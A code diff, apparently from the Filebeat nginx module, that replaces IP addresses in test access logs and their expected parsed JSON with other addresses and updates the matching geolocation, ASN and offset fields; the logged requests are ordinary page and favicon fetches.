 127.0.0.1 - - [07/Dec/2016:11:04:37 +0100] "GET /test1 HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
 127.0.0.1 - - [07/Dec/2016:11:04:58 +0100] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
 127.0.0.1 - - [07/Dec/2016:11:04:59 +0100] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
diff --git a/filebeat/module/nginx/access/test/access.log-expected.json b/filebeat/module/nginx/access/test/access.log-expected.json
index 6a0af6f499c7..b440144a3655 100644
--- a/filebeat/module/nginx/access/test/access.log-expected.json
+++ b/filebeat/module/nginx/access/test/access.log-expected.json
@@ -7,7 +7,7 @@
         "event.dataset": "nginx.access",
         "event.kind": "event",
         "event.module": "nginx",
-        "event.original": "77.179.66.156 - - [25/Oct/2016:14:49:33 +0200] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"",
+        "event.original": "89.160.20.156 - - [25/Oct/2016:14:49:33 +0200] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"",
         "event.outcome": "success",
         "event.timezone": "-02:00",
         "event.type": [
@@ -21,24 +21,24 @@
         "input.type": "log",
         "log.offset": 0,
         "nginx.access.remote_ip_list": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "related.ip": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "service.type": "nginx",
-        "source.address": "77.179.66.156",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Germersheim",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 49.2231,
-        "source.geo.location.lon": 8.3639,
-        "source.geo.region_iso_code": "DE-RP",
-        "source.geo.region_name": "Rheinland-Pfalz",
-        "source.ip": "77.179.66.156",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "url.original": "/",
         "url.path": "/",
         "user_agent.device.name": "Mac",
@@ -57,7 +57,7 @@
         "event.dataset": "nginx.access",
         "event.kind": "event",
         "event.module": "nginx",
-        "event.original": "77.179.66.156 - - [25/Oct/2016:14:49:34 +0200] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"",
+        "event.original": "89.160.20.156 - - [25/Oct/2016:14:49:34 +0200] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"",
         "event.outcome": "failure",
         "event.timezone": "-02:00",
         "event.type": [
@@ -72,24 +72,24 @@
         "input.type": "log",
         "log.offset": 199,
         "nginx.access.remote_ip_list": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "related.ip": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "service.type": "nginx",
-        "source.address": "77.179.66.156",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Germersheim",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 49.2231,
-        "source.geo.location.lon": 8.3639,
-        "source.geo.region_iso_code": "DE-RP",
-        "source.geo.region_name": "Rheinland-Pfalz",
-        "source.ip": "77.179.66.156",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "url.extension": "ico",
         "url.original": "/favicon.ico",
         "url.path": "/favicon.ico",
@@ -109,7 +109,7 @@
         "event.dataset": "nginx.access",
         "event.kind": "event",
         "event.module": "nginx",
-        "event.original": "77.179.66.156 - - [25/Oct/2016:14:50:44 +0200] \"GET /adsasd HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"",
+        "event.original": "89.160.20.156 - - [25/Oct/2016:14:50:44 +0200] \"GET /adsasd HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"",
         "event.outcome": "failure",
         "event.timezone": "-02:00",
         "event.type": [
@@ -123,24 +123,24 @@
         "input.type": "log",
         "log.offset": 430,
         "nginx.access.remote_ip_list": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "related.ip": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "service.type": "nginx",
-        "source.address": "77.179.66.156",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Germersheim",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 49.2231,
-        "source.geo.location.lon": 8.3639,
-        "source.geo.region_iso_code": "DE-RP",
-        "source.geo.region_name": "Rheinland-Pfalz",
-        "source.ip": "77.179.66.156",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "url.original": "/adsasd",
         "url.path": "/adsasd",
         "user_agent.device.name": "Mac",
@@ -159,7 +159,7 @@
         "event.dataset": "nginx.access",
         "event.kind": "event",
         "event.module": "nginx",
-        "event.original": "77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"",
+        "event.original": "89.160.20.156 - - [07/Dec/2016:10:34:43 +0100] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"",
         "event.outcome": "success",
         "event.timezone": "-02:00",
         "event.type": [
@@ -173,24 +173,24 @@
         "input.type": "log",
         "log.offset": 635,
         "nginx.access.remote_ip_list": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "related.ip": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "service.type": "nginx",
-        "source.address": "77.179.66.156",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Germersheim",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 49.2231,
-        "source.geo.location.lon": 8.3639,
-        "source.geo.region_iso_code": "DE-RP",
-        "source.geo.region_name": "Rheinland-Pfalz",
-        "source.ip": "77.179.66.156",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "url.original": "/",
         "url.path": "/",
         "user_agent.device.name": "Mac",
@@ -209,7 +209,7 @@
         "event.dataset": "nginx.access",
         "event.kind": "event",
         "event.module": "nginx",
-        "event.original": "77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"",
+        "event.original": "89.160.20.156 - - [07/Dec/2016:10:34:43 +0100] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"",
         "event.outcome": "failure",
         "event.timezone": "-02:00",
         "event.type": [
@@ -224,24 +224,24 @@
         "input.type": "log",
         "log.offset": 834,
         "nginx.access.remote_ip_list": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "related.ip": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "service.type": "nginx",
-        "source.address": "77.179.66.156",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Germersheim",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 49.2231,
-        "source.geo.location.lon": 8.3639,
-        "source.geo.region_iso_code": "DE-RP",
-        "source.geo.region_name": "Rheinland-Pfalz",
-        "source.ip": "77.179.66.156",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "url.extension": "ico",
         "url.original": "/favicon.ico",
         "url.path": "/favicon.ico",
@@ -261,7 +261,7 @@
         "event.dataset": "nginx.access",
         "event.kind": "event",
         "event.module": "nginx",
-        "event.original": "77.179.66.156 - - [07/Dec/2016:10:43:18 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"",
+        "event.original": "89.160.20.156 - - [07/Dec/2016:10:43:18 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"",
         "event.outcome": "failure",
         "event.timezone": "-02:00",
         "event.type": [
@@ -275,24 +275,24 @@
         "input.type": "log",
         "log.offset": 1065,
         "nginx.access.remote_ip_list": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "related.ip": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "service.type": "nginx",
-        "source.address": "77.179.66.156",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Germersheim",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 49.2231,
-        "source.geo.location.lon": 8.3639,
-        "source.geo.region_iso_code": "DE-RP",
-        "source.geo.region_name": "Rheinland-Pfalz",
-        "source.ip": "77.179.66.156",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "url.original": "/test",
         "url.path": "/test",
         "user_agent.device.name": "Mac",
@@ -311,7 +311,7 @@
         "event.dataset": "nginx.access",
         "event.kind": "event",
         "event.module": "nginx",
-        "event.original": "77.179.66.156 - - [07/Dec/2016:10:43:21 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"",
+        "event.original": "89.160.20.156 - - [07/Dec/2016:10:43:21 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"",
         "event.outcome": "failure",
         "event.timezone": "-02:00",
         "event.type": [
@@ -325,24 +325,24 @@
         "input.type": "log",
         "log.offset": 1268,
         "nginx.access.remote_ip_list": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "related.ip": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "service.type": "nginx",
-        "source.address": "77.179.66.156",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Germersheim",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 49.2231,
-        "source.geo.location.lon": 8.3639,
-        "source.geo.region_iso_code": "DE-RP",
-        "source.geo.region_name": "Rheinland-Pfalz",
-        "source.ip": "77.179.66.156",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "url.original": "/test",
         "url.path": "/test",
         "user_agent.device.name": "Mac",
@@ -361,7 +361,7 @@
         "event.dataset": "nginx.access",
         "event.kind": "event",
         "event.module": "nginx",
-        "event.original": "77.179.66.156 - - [07/Dec/2016:10:43:23 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"",
+        "event.original": "89.160.20.156 - - [07/Dec/2016:10:43:23 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"",
         "event.outcome": "failure",
         "event.timezone": "-02:00",
         "event.type": [
@@ -375,24 +375,24 @@
         "input.type": "log",
         "log.offset": 1471,
         "nginx.access.remote_ip_list": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "related.ip": [
-            "77.179.66.156"
+            "89.160.20.156"
         ],
         "service.type": "nginx",
-        "source.address": "77.179.66.156",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Germersheim",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 49.2231,
-        "source.geo.location.lon": 8.3639,
-        "source.geo.region_iso_code": "DE-RP",
-        "source.geo.region_name": "Rheinland-Pfalz",
-        "source.ip": "77.179.66.156",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "url.original": "/test1",
         "url.path": "/test1",
         "user_agent.device.name": "Mac",
diff --git a/filebeat/module/nginx/access/test/test-with-host.log b/filebeat/module/nginx/access/test/test-with-host.log
index 0706028b6a0c..2d4e8a95e14d 100644
--- a/filebeat/module/nginx/access/test/test-with-host.log
+++ b/filebeat/module/nginx/access/test/test-with-host.log
@@ -1,10 +1,10 @@
 example.com 10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
 example.com 172.17.0.1 - - [29/May/2017:19:02:48 +0000] "GET /stringpatch HTTP/1.1" 404 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-"
-example.com 10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
-example.com:80 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
-example.com:80 "10.5.102.222, 199.96.1.1, 204.246.1.1" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] "GET /assets/xxxx?q=100 HTTP/1.1" 200 25507 "-" "Amazon CloudFront"
-1.2.3.4 2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET /test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)"
-1.2.3.4:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] "" 400 0 "-" "-"
+example.com 10.0.0.2, 10.0.0.1, 81.2.69.143 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
+example.com:80 81.2.69.143 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
+example.com:80 "10.5.102.222, 175.16.199.1, 204.246.1.1" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] "GET /assets/xxxx?q=100 HTTP/1.1" 200 25507 "-" "Amazon CloudFront"
+1.128.3.4 2a02:cf40:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET /test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)"
+1.128.3.4:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] "" 400 0 "-" "-"
 example.com:80 unix: - - [26/Feb/2019:15:39:42 +0100] "hello" 400 173 "-" "-"
-1.2.3.4 localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-"
+1.128.3.4 localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-"
 example.com localhost, localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-"
diff --git a/filebeat/module/nginx/access/test/test-with-host.log-expected.json b/filebeat/module/nginx/access/test/test-with-host.log-expected.json
index 7de74d8c5402..41401a6e7953 100644
--- a/filebeat/module/nginx/access/test/test-with-host.log-expected.json
+++ b/filebeat/module/nginx/access/test/test-with-host.log-expected.json
@@ -94,7 +94,7 @@
         "event.dataset": "nginx.access",
         "event.kind": "event",
         "event.module": "nginx",
-        "event.original": "example.com 10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"",
+        "event.original": "example.com 10.0.0.2, 10.0.0.1, 81.2.69.143 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"",
         "event.outcome": "success",
         "event.timezone": "-02:00",
         "event.type": [
@@ -110,24 +110,22 @@
         "nginx.access.remote_ip_list": [
             "10.0.0.1",
             "10.0.0.2",
-            "85.181.35.98"
+            "81.2.69.143"
         ],
         "related.ip": [
-            "85.181.35.98"
+            "81.2.69.143"
         ],
         "service.type": "nginx",
-        "source.address": "85.181.35.98",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Berlin",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 52.4473,
-        "source.geo.location.lon": 13.4531,
-        "source.geo.region_iso_code": "DE-BE",
-        "source.geo.region_name": "Land Berlin",
-        "source.ip": "85.181.35.98",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "url.domain": "example.com",
         "url.original": "/ocelot",
         "url.path": "/ocelot",
@@ -149,7 +147,7 @@
         "event.dataset": "nginx.access",
         "event.kind": "event",
         "event.module": "nginx",
-        "event.original": "example.com:80 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"",
+        "event.original": "example.com:80 81.2.69.143 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"",
         "event.outcome": "success",
         "event.timezone": "-02:00",
         "event.type": [
@@ -161,26 +159,24 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 563,
+        "log.offset": 562,
         "nginx.access.remote_ip_list": [
-            "85.181.35.98"
+            "81.2.69.143"
         ],
         "related.ip": [
-            "85.181.35.98"
+            "81.2.69.143"
         ],
         "service.type": "nginx",
-        "source.address": "85.181.35.98",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Berlin",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 52.4473,
-        "source.geo.location.lon": 13.4531,
-        "source.geo.region_iso_code": "DE-BE",
-        "source.geo.region_name": "Land Berlin",
-        "source.ip": "85.181.35.98",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "url.domain": "example.com",
         "url.original": "/ocelot",
         "url.path": "/ocelot",
@@ -202,7 +198,7 @@
         "event.dataset": "nginx.access",
         "event.kind": "event",
         "event.module": "nginx",
-        "event.original": "example.com:80 \"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"",
+        "event.original": "example.com:80 \"10.5.102.222, 175.16.199.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"",
         "event.outcome": "success",
         "event.timezone": "-02:00",
         "event.type": [
@@ -214,29 +210,27 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 783,
+        "log.offset": 781,
         "nginx.access.remote_ip_list": [
             "10.2.1.185",
             "10.5.102.222",
-            "199.96.1.1",
+            "175.16.199.1",
             "204.246.1.1"
         ],
         "related.ip": [
-            "199.96.1.1"
+            "175.16.199.1"
         ],
         "service.type": "nginx",
-        "source.address": "199.96.1.1",
-        "source.as.number": 19065,
-        "source.as.organization.name": "Levi, Ray & Shoup, Inc.",
-        "source.geo.city_name": "Springfield",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 39.7647,
-        "source.geo.location.lon": -89.7379,
-        "source.geo.region_iso_code": "US-IL",
-        "source.geo.region_name": "Illinois",
-        "source.ip": "199.96.1.1",
+        "source.address": "175.16.199.1",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "url.domain": "example.com",
         "url.original": "/assets/xxxx?q=100",
         "url.path": "/assets/xxxx",
@@ -247,14 +241,14 @@
     },
     {
         "@timestamp": "2016-12-30T06:47:09.000Z",
-        "destination.ip": "1.2.3.4",
+        "destination.ip": "1.128.3.4",
         "event.category": [
             "web"
         ],
         "event.dataset": "nginx.access",
         "event.kind": "event",
         "event.module": "nginx",
-        "event.original": "1.2.3.4 2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"",
+        "event.original": "1.128.3.4 2a02:cf40:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"",
         "event.outcome": "failure",
         "event.timezone": "-02:00",
         "event.type": [
@@ -270,20 +264,20 @@
         "nginx.access.remote_ip_list": [
             "10.2.2.121",
             "10.225.192.17",
-            "2a03:0000:10ff:f00f:0000:0000:0:8000"
+            "2a02:cf40:10ff:f00f:0000:0000:0:8000"
         ],
         "related.ip": [
-            "1.2.3.4",
-            "2a03:0000:10ff:f00f:0000:0000:0:8000"
+            "1.128.3.4",
+            "2a02:cf40:10ff:f00f:0000:0000:0:8000"
         ],
         "service.type": "nginx",
-        "source.address": "2a03:0000:10ff:f00f:0000:0000:0:8000",
+        "source.address": "2a02:cf40:10ff:f00f:0000:0000:0:8000",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "PT",
-        "source.geo.country_name": "Portugal",
-        "source.geo.location.lat": 39.5,
-        "source.geo.location.lon": -8.0,
-        "source.ip": "2a03:0000:10ff:f00f:0000:0000:0:8000",
+        "source.geo.country_iso_code": "NO",
+        "source.geo.country_name": "Norway",
+        "source.geo.location.lat": 62.0,
+        "source.geo.location.lon": 10.0,
+        "source.ip": "2a02:cf40:10ff:f00f:0000:0000:0:8000",
         "url.extension": "html",
         "url.original": "/test.html",
         "url.path": "/test.html",
@@ -294,7 +288,7 @@
     },
     {
